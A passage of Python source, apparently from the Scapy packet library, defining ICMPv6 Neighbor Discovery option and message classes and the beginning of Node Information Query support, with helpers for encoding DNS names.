1774 3: "ICMPv6NDOptPrefixInfo", 

1775 4: "ICMPv6NDOptRedirectedHdr", 

1776 5: "ICMPv6NDOptMTU", 

1777 6: "ICMPv6NDOptShortcutLimit", 

1778 7: "ICMPv6NDOptAdvInterval", 

1779 8: "ICMPv6NDOptHAInfo", 

1780 9: "ICMPv6NDOptSrcAddrList", 

1781 10: "ICMPv6NDOptTgtAddrList", 

1782 # 11: ICMPv6NDOptCGA, RFC3971 - contrib/send.py 

1783 # 12: ICMPv6NDOptRsaSig, RFC3971 - contrib/send.py 

1784 # 13: ICMPv6NDOptTmstp, RFC3971 - contrib/send.py 

1785 # 14: ICMPv6NDOptNonce, RFC3971 - contrib/send.py 

1786 # 15: Do Me, 

1787 # 16: Do Me, 

1788 17: "ICMPv6NDOptIPAddr", 

1789 18: "ICMPv6NDOptNewRtrPrefix", 

1790 19: "ICMPv6NDOptLLA", 

1791 # 18: Do Me, 

1792 # 19: Do Me, 

1793 # 20: Do Me, 

1794 # 21: Do Me, 

1795 # 22: Do Me, 

1796 23: "ICMPv6NDOptMAP", 

1797 24: "ICMPv6NDOptRouteInfo", 

1798 25: "ICMPv6NDOptRDNSS", 

1799 26: "ICMPv6NDOptEFA", 

1800 31: "ICMPv6NDOptDNSSL", 

1801 37: "ICMPv6NDOptCaptivePortal", 

1802 38: "ICMPv6NDOptPREF64", 

1803 } 

1804 

1805icmp6ndraprefs = {0: "Medium (default)", 

1806 1: "High", 

1807 2: "Reserved", 

1808 3: "Low"} # RFC 4191 

1809 

1810 

1811class _ICMPv6NDGuessPayload: 

1812 name = "Dummy ND class that implements guess_payload_class()" 

1813 

1814 def guess_payload_class(self, p): 

1815 if len(p) > 1: 

1816 return icmp6ndoptscls.get(orb(p[0]), ICMPv6NDOptUnknown) 

1817 

1818 

1819# Beginning of ICMPv6 Neighbor Discovery Options. 

1820 

1821class ICMPv6NDOptDataField(StrLenField): 

1822 __slots__ = ["strip_zeros"] 

1823 

1824 def __init__(self, name, default, strip_zeros=False, **kwargs): 

1825 super().__init__(name, default, **kwargs) 

1826 self.strip_zeros = strip_zeros 

1827 

1828 def i2len(self, pkt, x): 

1829 return len(self.i2m(pkt, x)) 

1830 

1831 def i2m(self, pkt, x): 

1832 r = (len(x) + 2) % 8 

1833 if r: 

1834 x += b"\x00" * (8 - r) 

1835 return x 

1836 

1837 def m2i(self, pkt, x): 

1838 if self.strip_zeros: 

1839 x = x.rstrip(b"\x00") 

1840 return x 

1841 

1842 

1843class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet): 

1844 name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented" 

1845 fields_desc = [ByteField("type", 0), 

1846 FieldLenField("len", None, length_of="data", fmt="B", 

1847 adjust=lambda pkt, x: (2 + x) // 8), 

1848 ICMPv6NDOptDataField("data", "", strip_zeros=False, 

1849 length_from=lambda pkt: 

1850 8 * max(pkt.len, 1) - 2)] 

1851 

1852# NOTE: len includes type and len field. Expressed in unit of 8 bytes 

1853# TODO: Revoir le coup du ETHER_ANY 

1854 

1855 

1856class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet): 

1857 name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address" 

1858 fields_desc = [ByteField("type", 1), 

1859 ByteField("len", 1), 

1860 SourceMACField("lladdr")] 

1861 

1862 def mysummary(self): 

1863 return self.sprintf("%name% %lladdr%") 

1864 

1865 

1866class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr): 

1867 name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address" 

1868 type = 2 

1869 

1870 

1871class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet): 

1872 name = "ICMPv6 Neighbor Discovery Option - Prefix Information" 

1873 fields_desc = [ByteField("type", 3), 

1874 ByteField("len", 4), 

1875 ByteField("prefixlen", 64), 

1876 BitField("L", 1, 1), 

1877 BitField("A", 1, 1), 

1878 BitField("R", 0, 1), 

1879 BitField("res1", 0, 5), 

1880 XIntField("validlifetime", 0xffffffff), 

1881 XIntField("preferredlifetime", 0xffffffff), 

1882 XIntField("res2", 0x00000000), 

1883 IP6Field("prefix", "::")] 

1884 

1885 def mysummary(self): 

1886 return self.sprintf("%name% %prefix%/%prefixlen% " 

1887 "On-link %L% Autonomous Address %A% " 

1888 "Router Address %R%") 

1889 

1890# TODO: We should also limit the size of included packet to something 

1891# like (initiallen - 40 - 2) 

1892 

1893 

1894class TruncPktLenField(PacketLenField): 

1895 def i2m(self, pkt, x): 

1896 s = bytes(x) 

1897 tmp_len = len(s) 

1898 return s[:tmp_len - (tmp_len % 8)] 

1899 

1900 def i2len(self, pkt, i): 

1901 return len(self.i2m(pkt, i)) 

1902 

1903 

1904class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet): 

1905 name = "ICMPv6 Neighbor Discovery Option - Redirected Header" 

1906 fields_desc = [ByteField("type", 4), 

1907 FieldLenField("len", None, length_of="pkt", fmt="B", 

1908 adjust=lambda pkt, x: (x + 8) // 8), 

1909 MayEnd(StrFixedLenField("res", b"\x00" * 6, 6)), 

1910 TruncPktLenField("pkt", b"", IPv6, 

1911 length_from=lambda pkt: 8 * pkt.len - 8)] 

1912 

1913# See which value should be used for default MTU instead of 1280 

1914 

1915 

1916class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet): 

1917 name = "ICMPv6 Neighbor Discovery Option - MTU" 

1918 fields_desc = [ByteField("type", 5), 

1919 ByteField("len", 1), 

1920 XShortField("res", 0), 

1921 IntField("mtu", 1280)] 

1922 

1923 def mysummary(self): 

1924 return self.sprintf("%name% %mtu%") 

1925 

1926 

1927class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491 

1928 name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit" 

1929 fields_desc = [ByteField("type", 6), 

1930 ByteField("len", 1), 

1931 ByteField("shortcutlim", 40), # XXX 

1932 ByteField("res1", 0), 

1933 IntField("res2", 0)] 

1934 

1935 

1936class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet): 

1937 name = "ICMPv6 Neighbor Discovery - Interval Advertisement" 

1938 fields_desc = [ByteField("type", 7), 

1939 ByteField("len", 1), 

1940 ShortField("res", 0), 

1941 IntField("advint", 0)] 

1942 

1943 def mysummary(self): 

1944 return self.sprintf("%name% %advint% milliseconds") 

1945 

1946 

1947class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet): 

1948 name = "ICMPv6 Neighbor Discovery - Home Agent Information" 

1949 fields_desc = [ByteField("type", 8), 

1950 ByteField("len", 1), 

1951 ShortField("res", 0), 

1952 ShortField("pref", 0), 

1953 ShortField("lifetime", 1)] 

1954 

1955 def mysummary(self): 

1956 return self.sprintf("%name% %pref% %lifetime% seconds") 

1957 

1958# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support 

1959 

1960# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support 

1961 

1962 

1963class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068 

1964 name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)" 

1965 fields_desc = [ByteField("type", 17), 

1966 ByteField("len", 3), 

1967 ByteEnumField("optcode", 1, {1: "Old Care-Of Address", 

1968 2: "New Care-Of Address", 

1969 3: "NAR's IP address"}), 

1970 ByteField("plen", 64), 

1971 IntField("res", 0), 

1972 IP6Field("addr", "::")] 

1973 

1974 

1975class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068 

1976 name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)" # noqa: E501 

1977 fields_desc = [ByteField("type", 18), 

1978 ByteField("len", 3), 

1979 ByteField("optcode", 0), 

1980 ByteField("plen", 64), 

1981 IntField("res", 0), 

1982 IP6Field("prefix", "::")] 

1983 

1984 

1985_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP", 

1986 1: "LLA for the new AP", 

1987 2: "LLA of the MN", 

1988 3: "LLA of the NAR", 

1989 4: "LLA of the src of TrSolPr or PrRtAdv msg", 

1990 5: "AP identified by LLA belongs to current iface of router", # noqa: E501 

1991 6: "No preifx info available for AP identified by the LLA", # noqa: E501 

1992 7: "No fast handovers support for AP identified by the LLA"} # noqa: E501 

1993 

1994 

1995class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068 

1996 name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)" # noqa: E501 

1997 fields_desc = [ByteField("type", 19), 

1998 ByteField("len", 1), 

1999 ByteEnumField("optcode", 0, _rfc4068_lla_optcode), 

2000 MACField("lla", ETHER_ANY)] # We only support ethernet 

2001 

2002 

2003class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140 

2004 name = "ICMPv6 Neighbor Discovery - MAP Option" 

2005 fields_desc = [ByteField("type", 23), 

2006 ByteField("len", 3), 

2007 BitField("dist", 1, 4), 

2008 BitField("pref", 15, 4), # highest availability 

2009 BitField("R", 1, 1), 

2010 BitField("res", 0, 7), 

2011 IntField("validlifetime", 0xffffffff), 

2012 IP6Field("addr", "::")] 

2013 

2014 

2015class _IP6PrefixField(IP6Field): 

2016 __slots__ = ["length_from"] 

2017 

2018 def __init__(self, name, default): 

2019 IP6Field.__init__(self, name, default) 

2020 self.length_from = lambda pkt: 8 * (pkt.len - 1) 

2021 

2022 def addfield(self, pkt, s, val): 

2023 return s + self.i2m(pkt, val) 

2024 

2025 def getfield(self, pkt, s): 

2026 tmp_len = self.length_from(pkt) 

2027 p = s[:tmp_len] 

2028 if tmp_len < 16: 

2029 p += b'\x00' * (16 - tmp_len) 

2030 return s[tmp_len:], self.m2i(pkt, p) 

2031 

2032 def i2len(self, pkt, x): 

2033 return len(self.i2m(pkt, x)) 

2034 

2035 def i2m(self, pkt, x): 

2036 tmp_len = pkt.len 

2037 

2038 if x is None: 

2039 x = "::" 

2040 if tmp_len is None: 

2041 tmp_len = 1 

2042 x = inet_pton(socket.AF_INET6, x) 

2043 

2044 if tmp_len is None: 

2045 return x 

2046 if tmp_len in [0, 1]: 

2047 return b"" 

2048 if tmp_len in [2, 3]: 

2049 return x[:8 * (tmp_len - 1)] 

2050 

2051 return x + b'\x00' * 8 * (tmp_len - 3) 

2052 

2053 

2054class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191 

2055 name = "ICMPv6 Neighbor Discovery Option - Route Information Option" 

2056 fields_desc = [ByteField("type", 24), 

2057 FieldLenField("len", None, length_of="prefix", fmt="B", 

2058 adjust=lambda pkt, x: x // 8 + 1), 

2059 ByteField("plen", None), 

2060 BitField("res1", 0, 3), 

2061 BitEnumField("prf", 0, 2, icmp6ndraprefs), 

2062 BitField("res2", 0, 3), 

2063 IntField("rtlifetime", 0xffffffff), 

2064 _IP6PrefixField("prefix", None)] 

2065 

2066 def mysummary(self): 

2067 return self.sprintf("%name% %prefix%/%plen% Preference %prf%") 

2068 

2069 

2070class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006 

2071 name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option" 

2072 fields_desc = [ByteField("type", 25), 

2073 FieldLenField("len", None, count_of="dns", fmt="B", 

2074 adjust=lambda pkt, x: 2 * x + 1), 

2075 ShortField("res", None), 

2076 IntField("lifetime", 0xffffffff), 

2077 IP6ListField("dns", [], 

2078 length_from=lambda pkt: 8 * (pkt.len - 1))] 

2079 

2080 def mysummary(self): 

2081 return self.sprintf("%name% ") + ", ".join(self.dns) 

2082 

2083 

2084class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075) 

2085 name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option" 

2086 fields_desc = [ByteField("type", 26), 

2087 ByteField("len", 1), 

2088 BitField("res", 0, 48)] 

2089 

2090# As required in Sect 8. of RFC 3315, Domain Names must be encoded as 

2091# described in section 3.1 of RFC 1035 

2092# XXX Label should be at most 63 octets in length : we do not enforce it 

2093# Total length of domain should be 255 : we do not enforce it either 

2094 

2095 

2096class DomainNameListField(StrLenField): 

2097 __slots__ = ["padded"] 

2098 islist = 1 

2099 padded_unit = 8 

2100 

2101 def __init__(self, name, default, length_from=None, padded=False): # noqa: E501 

2102 self.padded = padded 

2103 StrLenField.__init__(self, name, default, length_from=length_from) 

2104 

2105 def i2len(self, pkt, x): 

2106 return len(self.i2m(pkt, x)) 

2107 

2108 def i2h(self, pkt, x): 

2109 if not x: 

2110 return [] 

2111 return x 

2112 

2113 def m2i(self, pkt, x): 

2114 x = plain_str(x) # Decode bytes to string 

2115 res = [] 

2116 while x: 

2117 # Get a name until \x00 is reached 

2118 cur = [] 

2119 while x and ord(x[0]) != 0: 

2120 tmp_len = ord(x[0]) 

2121 cur.append(x[1:tmp_len + 1]) 

2122 x = x[tmp_len + 1:] 

2123 if self.padded: 

2124 # Discard following \x00 in padded mode 

2125 if len(cur): 

2126 res.append(".".join(cur) + ".") 

2127 else: 

2128 # Store the current name 

2129 res.append(".".join(cur) + ".") 

2130 if x and ord(x[0]) == 0: 

2131 x = x[1:] 

2132 return res 

2133 

2134 def i2m(self, pkt, x): 

2135 def conditionalTrailingDot(z): 

2136 if z and orb(z[-1]) == 0: 

2137 return z 

2138 return z + b'\x00' 

2139 # Build the encode names 

2140 tmp = ([chb(len(z)) + z.encode("utf8") for z in y.split('.')] for y in x) # Also encode string to bytes # noqa: E501 

2141 ret_string = b"".join(conditionalTrailingDot(b"".join(x)) for x in tmp) 

2142 

2143 # In padded mode, add some \x00 bytes 

2144 if self.padded and not len(ret_string) % self.padded_unit == 0: 

2145 ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit) # noqa: E501 

2146 

2147 return ret_string 

2148 

2149 

2150class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106 

2151 name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option" 

2152 fields_desc = [ByteField("type", 31), 

2153 FieldLenField("len", None, length_of="searchlist", fmt="B", 

2154 adjust=lambda pkt, x: 1 + x // 8), 

2155 ShortField("res", None), 

2156 IntField("lifetime", 0xffffffff), 

2157 DomainNameListField("searchlist", [], 

2158 length_from=lambda pkt: 8 * pkt.len - 8, 

2159 padded=True) 

2160 ] 

2161 

2162 def mysummary(self): 

2163 return self.sprintf("%name% ") + ", ".join(self.searchlist) 

2164 

2165 

2166class ICMPv6NDOptCaptivePortal(_ICMPv6NDGuessPayload, Packet): # RFC 8910 

2167 name = "ICMPv6 Neighbor Discovery Option - Captive-Portal Option" 

2168 fields_desc = [ByteField("type", 37), 

2169 FieldLenField("len", None, length_of="URI", fmt="B", 

2170 adjust=lambda pkt, x: (2 + x) // 8), 

2171 ICMPv6NDOptDataField("URI", "", strip_zeros=True, 

2172 length_from=lambda pkt: 

2173 8 * max(pkt.len, 1) - 2)] 

2174 

2175 def mysummary(self): 

2176 return self.sprintf("%name% %URI%") 

2177 

2178 

2179class _PREF64(IP6Field): 

2180 def addfield(self, pkt, s, val): 

2181 return s + self.i2m(pkt, val)[:12] 

2182 

2183 def getfield(self, pkt, s): 

2184 return s[12:], self.m2i(pkt, s[:12] + b"\x00" * 4) 

2185 

2186 

2187class ICMPv6NDOptPREF64(_ICMPv6NDGuessPayload, Packet): # RFC 8781 

2188 name = "ICMPv6 Neighbor Discovery Option - PREF64 Option" 

2189 fields_desc = [ByteField("type", 38), 

2190 ByteField("len", 2), 

2191 BitField("scaledlifetime", 0, 13), 

2192 BitEnumField("plc", 0, 3, 

2193 ["/96", "/64", "/56", "/48", "/40", "/32"]), 

2194 _PREF64("prefix", "::")] 

2195 

2196 def mysummary(self): 

2197 plc = self.sprintf("%plc%") if self.plc < 6 else f"[invalid PLC({self.plc})]" 

2198 return self.sprintf("%name% %prefix%") + plc 

2199 

2200# End of ICMPv6 Neighbor Discovery Options. 

2201 

2202 

2203class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6): 

2204 name = "ICMPv6 Neighbor Discovery - Router Solicitation" 

2205 fields_desc = [ByteEnumField("type", 133, icmp6types), 

2206 ByteField("code", 0), 

2207 XShortField("cksum", None), 

2208 IntField("res", 0)] 

2209 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::2", "hlim": 255}} 

2210 

2211 

2212class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6): 

2213 name = "ICMPv6 Neighbor Discovery - Router Advertisement" 

2214 fields_desc = [ByteEnumField("type", 134, icmp6types), 

2215 ByteField("code", 0), 

2216 XShortField("cksum", None), 

2217 ByteField("chlim", 0), 

2218 BitField("M", 0, 1), 

2219 BitField("O", 0, 1), 

2220 BitField("H", 0, 1), 

2221 BitEnumField("prf", 1, 2, icmp6ndraprefs), # RFC 4191 

2222 BitField("P", 0, 1), 

2223 BitField("res", 0, 2), 

2224 ShortField("routerlifetime", 1800), 

2225 IntField("reachabletime", 0), 

2226 IntField("retranstimer", 0)] 

2227 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 

2228 

2229 def answers(self, other): 

2230 return isinstance(other, ICMPv6ND_RS) 

2231 

2232 def mysummary(self): 

2233 return self.sprintf("%name% Lifetime %routerlifetime% " 

2234 "Hop Limit %chlim% Preference %prf% " 

2235 "Managed %M% Other %O% Home %H%") 

2236 

2237 

2238class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet): 

2239 name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation" 

2240 fields_desc = [ByteEnumField("type", 135, icmp6types), 

2241 ByteField("code", 0), 

2242 XShortField("cksum", None), 

2243 IntField("res", 0), 

2244 IP6Field("tgt", "::")] 

2245 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 

2246 

2247 def mysummary(self): 

2248 return self.sprintf("%name% (tgt: %tgt%)") 

2249 

2250 def hashret(self): 

2251 return bytes_encode(self.tgt) + self.payload.hashret() 

2252 

2253 

2254class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet): 

2255 name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement" 

2256 fields_desc = [ByteEnumField("type", 136, icmp6types), 

2257 ByteField("code", 0), 

2258 XShortField("cksum", None), 

2259 BitField("R", 1, 1), 

2260 BitField("S", 0, 1), 

2261 BitField("O", 1, 1), 

2262 XBitField("res", 0, 29), 

2263 IP6Field("tgt", "::")] 

2264 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 

2265 

2266 def mysummary(self): 

2267 return self.sprintf("%name% (tgt: %tgt%)") 

2268 

2269 def hashret(self): 

2270 return bytes_encode(self.tgt) + self.payload.hashret() 

2271 

2272 def answers(self, other): 

2273 return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt 

2274 

2275# associated possible options : target link-layer option, Redirected header 

2276 

2277 

2278class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet): 

2279 name = "ICMPv6 Neighbor Discovery - Redirect" 

2280 fields_desc = [ByteEnumField("type", 137, icmp6types), 

2281 ByteField("code", 0), 

2282 XShortField("cksum", None), 

2283 XIntField("res", 0), 

2284 IP6Field("tgt", "::"), 

2285 IP6Field("dst", "::")] 

2286 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 

2287 

2288 

2289# ICMPv6 Inverse Neighbor Discovery (RFC 3122) # 

2290 

2291class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet): 

2292 name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List" 

2293 fields_desc = [ByteField("type", 9), 

2294 FieldLenField("len", None, count_of="addrlist", fmt="B", 

2295 adjust=lambda pkt, x: 2 * x + 1), 

2296 StrFixedLenField("res", b"\x00" * 6, 6), 

2297 IP6ListField("addrlist", [], 

2298 length_from=lambda pkt: 8 * (pkt.len - 1))] 

2299 

2300 

2301class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList): 

2302 name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List" 

2303 type = 10 

2304 

2305 

2306# RFC3122 

2307# Options requises : source lladdr et target lladdr 

2308# Autres options valides : source address list, MTU 

2309# - Comme precise dans le document, il serait bien de prendre l'adresse L2 

2310# demandee dans l'option requise target lladdr et l'utiliser au niveau 

2311# de l'adresse destination ethernet si aucune adresse n'est precisee 

2312# - ca semble pas forcement pratique si l'utilisateur doit preciser toutes 

2313# les options. 

2314# Ether() must use the target lladdr as destination 

2315class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6): 

2316 name = "ICMPv6 Inverse Neighbor Discovery Solicitation" 

2317 fields_desc = [ByteEnumField("type", 141, icmp6types), 

2318 ByteField("code", 0), 

2319 XShortField("cksum", None), 

2320 XIntField("reserved", 0)] 

2321 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 

2322 

2323# Options requises : target lladdr, target address list 

2324# Autres options valides : MTU 

2325 

2326 

2327class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6): 

2328 name = "ICMPv6 Inverse Neighbor Discovery Advertisement" 

2329 fields_desc = [ByteEnumField("type", 142, icmp6types), 

2330 ByteField("code", 0), 

2331 XShortField("cksum", None), 

2332 XIntField("reserved", 0)] 

2333 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 

2334 

2335 

2336############################################################################### 

2337# ICMPv6 Node Information Queries (RFC 4620) 

2338############################################################################### 

2339 

2340# [ ] Add automatic destination address computation using computeNIGroupAddr 

2341# in IPv6 class (Scapy6 modification when integrated) if : 

2342# - it is not provided 

2343# - upper layer is ICMPv6NIQueryName() with a valid value 

2344# [ ] Try to be liberal in what we accept as internal values for _explicit_ 

2345# DNS elements provided by users. Any string should be considered 

2346# valid and kept like it has been provided. At the moment, i2repr() will 

2347# crash on many inputs 

2348# [ ] Do the documentation 

2349# [ ] Add regression tests 

2350# [ ] Perform test against real machines (NOOP reply is proof of implementation). # noqa: E501 

2351# [ ] Check if there are differences between different stacks. Among *BSD, 

2352# with others. 

2353# [ ] Deal with flags in a consistent way. 

2354# [ ] Implement compression in names2dnsrepr() and decompresiion in 

2355# dnsrepr2names(). Should be deactivable. 

2356 

2357icmp6_niqtypes = {0: "NOOP", 

2358 2: "Node Name", 

2359 3: "IPv6 Address", 

2360 4: "IPv4 Address"} 

2361 

2362 

2363class _ICMPv6NIHashret: 

2364 def hashret(self): 

2365 return bytes_encode(self.nonce) 

2366 

2367 

2368class _ICMPv6NIAnswers: 

2369 def answers(self, other): 

2370 return self.nonce == other.nonce 

2371 

2372# Buggy; always returns the same value during a session 

2373 

2374 

2375class NonceField(StrFixedLenField): 

2376 def __init__(self, name, default=None): 

2377 StrFixedLenField.__init__(self, name, default, 8) 

2378 if default is None: 

2379 self.default = self.randval() 

2380 

2381 

2382@conf.commands.register 

2383def computeNIGroupAddr(name): 

2384 """Compute the NI group Address. Can take a FQDN as input parameter""" 

2385 name = name.lower().split(".")[0] 

2386 record = chr(len(name)) + name 

2387 h = md5(record.encode("utf8")) 

2388 h = h.digest() 

2389 addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4]) 

2390 return addr 

2391 

2392 

2393# Here is the deal. First, that protocol is a piece of shit. Then, we 

2394# provide 4 classes for the different kinds of Requests (one for every 

2395# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same 

2396# data field class that is made to be smart by guessing the specific 

2397# type of value provided : 

2398# 

2399# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0, 

2400# if not overridden by user 

2401# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2, 

2402# if not overridden 

2403# - Name in the other cases: code is set to 0, if not overridden by user 

2404# 

2405# Internal storage, is not only the value, but the a pair providing 

2406# the type and the value (1 is IPv6@, 1 is Name or string, 2 is IPv4@) 

2407# 

2408# Note : I merged getfield() and m2i(). m2i() should not be called 

2409# directly anyway. Same remark for addfield() and i2m() 

2410# 

2411# -- arno 

2412 

2413# "The type of information present in the Data field of a query is 

2414# declared by the ICMP Code, whereas the type of information in a 

2415# Reply is determined by the Qtype" 

2416 

2417def names2dnsrepr(x): 

2418 """ 

2419 Take as input a list of DNS names or a single DNS name 

2420 and encode it in DNS format (with possible compression) 

2421 If a string that is already a DNS name in DNS format 

2422 is passed, it is returned unmodified. Result is a string. 

2423 !!! At the moment, compression is not implemented !!! 

2424 """ 

2425 

2426 if isinstance(x, bytes): 

2427 if x and x[-1:] == b'\x00': # stupid heuristic 

2428 return x 

2429 x = [x] 

2430 

2431 res = [] 

2432 for n in x: 

2433 termin = b"\x00" 

2434 if n.count(b'.') == 0: # single-component gets one more 

2435 termin += b'\x00' 

2436 n = b"".join(chb(len(y)) + y for y in n.split(b'.')) + termin 

2437 res.append(n) 

2438 return b"".join(res) 

2439 

2440 

2441def dnsrepr2names(x): 

2442 """ 

2443 Take as input a DNS encoded string (possibly compressed) 

2444 and returns a list of DNS names contained in it. 

2445 If provided string is already in printable format 

2446 (does not end with a null character, a one element list 

2447 is returned). Result is a list. 

2448 """ 

2449 res = [] 

2450 cur = b"" 

2451 while x: 

2452 tmp_len = orb(x[0]) 

2453 x = x[1:] 

2454 if not tmp_len: 

2455 if cur and cur[-1:] == b'.': 

2456 cur = cur[:-1] 

2457 res.append(cur) 

2458 cur = b"" 

2459 if x and orb(x[0]) == 0: # single component 

2460 x = x[1:] 

2461 continue 

2462 if tmp_len & 0xc0: # XXX TODO : work on that -- arno 

2463 raise Exception("DNS message can't be compressed at this point!") 

2464 cur += x[:tmp_len] + b"." 

2465 x = x[tmp_len:] 

2466 return res 

2467 

2468 

2469class NIQueryDataField(StrField): 

2470 def __init__(self, name, default): 

2471 StrField.__init__(self, name, default) 

2472 

2473 def i2h(self, pkt, x): 

2474 if x is None: 

2475 return x 

2476 t, val = x 

2477 if t == 1: 

2478 val = dnsrepr2names(val)[0] 

2479 return val 

2480 

2481 def h2i(self, pkt, x): 

2482 if x is tuple and isinstance(x[0], int): 

2483 return x 

2484 

2485 # Try IPv6 

2486 try: 

2487 inet_pton(socket.AF_INET6, x.decode()) 

2488 return (0, x.decode()) 

2489 except Exception: 

2490 pass 

2491 # Try IPv4 

2492 try: 

2493 inet_pton(socket.AF_INET, x.decode()) 

2494 return (2, x.decode()) 

2495 except Exception: 

2496 pass 

2497 # Try DNS 

2498 if x is None: 

2499 x = b"" 

2500 x = names2dnsrepr(x) 

2501 return (1, x) 

2502 

2503 def i2repr(self, pkt, x): 

2504 t, val = x 

2505 if t == 1: # DNS Name 

2506 # we don't use dnsrepr2names() to deal with 

2507 # possible weird data extracted info 

2508 res = [] 

2509 while val: 

2510 tmp_len = orb(val[0]) 

2511 val = val[1:] 

2512 if tmp_len == 0: 

2513 break 

2514 res.append(plain_str(val[:tmp_len]) + ".") 

2515 val = val[tmp_len:] 

2516 tmp = "".join(res) 

2517 if tmp and tmp[-1] == '.': 

2518 tmp = tmp[:-1] 

2519 return tmp 

2520 return repr(val) 

2521 

2522 def getfield(self, pkt, s): 

2523 qtype = getattr(pkt, "qtype") 

2524 if qtype == 0: # NOOP 

2525 return s, (0, b"") 

2526 else: 

2527 code = getattr(pkt, "code") 

2528 if code == 0: # IPv6 Addr 

2529 return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16])) 

2530 elif code == 2: # IPv4 Addr 

2531 return s[4:], (2, inet_ntop(socket.AF_INET, s[:4])) 

2532 else: # Name or Unknown 

2533 return b"", (1, s) 

2534 

2535 def addfield(self, pkt, s, val): 

2536 if ((isinstance(val, tuple) and val[1] is None) or 

2537 val is None): 

2538 val = (1, b"") 

2539 t = val[0] 

2540 if t == 1: 

2541 return s + val[1] 

2542 elif t == 0: 

2543 return s + inet_pton(socket.AF_INET6, val[1]) 

2544 else: 

2545 return s + inet_pton(socket.AF_INET, val[1]) 

2546 

2547 

2548class NIQueryCodeField(ByteEnumField): 

2549 def i2m(self, pkt, x): 

2550 if x is None: 

2551 d = pkt.getfieldval("data") 

2552 if d is None: 

2553 return 1 

2554 elif d[0] == 0: # IPv6 address 

2555 return 0 

2556 elif d[0] == 1: # Name 

2557 return 1 

2558 elif d[0] == 2: # IPv4 address 

2559 return 2 

2560 else: 

2561 return 1 

2562 return x 

2563 

2564 

2565_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"} 

2566 

2567# _niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses", 

2568# 8: "Link-local addresses", 16: "Site-local addresses", 

2569# 32: "Global addresses" } 

2570 

2571# "This NI type has no defined flags and never has a Data Field". Used 

2572# to know if the destination is up and implements NI protocol. 

2573 

2574 

2575class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6): 

2576 name = "ICMPv6 Node Information Query - NOOP Query" 

2577 fields_desc = [ByteEnumField("type", 139, icmp6types), 

2578 NIQueryCodeField("code", None, _niquery_code), 

2579 XShortField("cksum", None), 

2580 ShortEnumField("qtype", 0, icmp6_niqtypes), 

2581 BitField("unused", 0, 10), 

2582 FlagsField("flags", 0, 6, "TACLSG"), 

2583 NonceField("nonce", None), 

2584 NIQueryDataField("data", None)] 

2585 

2586 

2587class ICMPv6NIQueryName(ICMPv6NIQueryNOOP): 

2588 name = "ICMPv6 Node Information Query - IPv6 Name Query" 

2589 qtype = 2 

2590 

2591# We ask for the IPv6 address of the peer 

